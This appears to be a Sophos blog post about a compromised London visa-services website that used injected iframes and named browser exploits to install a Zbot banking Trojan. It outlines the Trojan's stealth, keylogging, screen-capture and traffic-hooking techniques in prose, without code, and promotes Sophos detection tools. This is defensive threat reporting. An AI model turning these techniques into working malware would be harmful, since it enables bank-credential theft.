More Zbot: Get a visa, get infected

Image (1) zbot-stealth.png for post 21758

We have previously blogged about Zbot banking Trojans being installed in various web attacks [1]. Since then, the authors have kept themselves busy. We have identified numerous malicious web sites using exploits in order to try to infect victims. Last week our colleagues at F-Secure recently blogged about Finnish spam linking to a site which infected visitors with a Zbot variant [2].

Earlier on today I was investigating the site of a company based in London who specialize in helping clients obtain visas for international travel. We had reports of their site being infected with a malicious script (Troj/Unif-B). Sure enough, the site has been compromised, with a malicious script that writes an iframe to the page in order to load content from a remote machine (in Russia). Multiple exploits are used in the attack including:

In addition to these, some of the regular old favourites are being used (NCTAudio, WebViewFolderIcon, SuperBuddy, MDAC and friends).

The exploits attempt to install a Win32 downloader trojan which downloads a Zbot variant. Fortunately for Sophos users, both files are proactively detected as Mal/EncPk-CJ. If undetected and allowed to install, Zbot would copy itself into the system directory using the somewhat notorious filename of ntos.exe. There are many variants within this family, triggering generic detections such as Mal/EncPk-CJ, Mal/Zbot-A or Mal/Zbot-B. Once running, Zbot stealths the presence of itself and some other configuration/data files, as can be seen if you run an anti-rootkit scanner:

[Zbot stealthing]

(For readers not running a Sophos product who may be infected, I tested using Sophos’s free anti-rootkit scanner to remove Zbot and cleanup worked fine.)

Historically, Zbot banking malware has targeted multiple banking institutions, using a variety of techniques including:

  • screen capture
  • sniffing network traffic (hooking WS2_32.DLL and WSOCK32.DLL functions)
  • keylogging
  • clipboard
  • redirecting traffic (may modify HOSTS file in addition to hooking network functions)

Users should make use of all the technologies Sophos provides to block this (and other threats). In particular, suspicious file detections and runtime HIPs protection provide a vital layer against today’s aggressive malware campaigns. As an example, if these Zbot variants were not already detected during a file scan, the user would still be protected by HIPs which would block its installation (HIPS/RegMod-012 and HIPS/FileMod-001).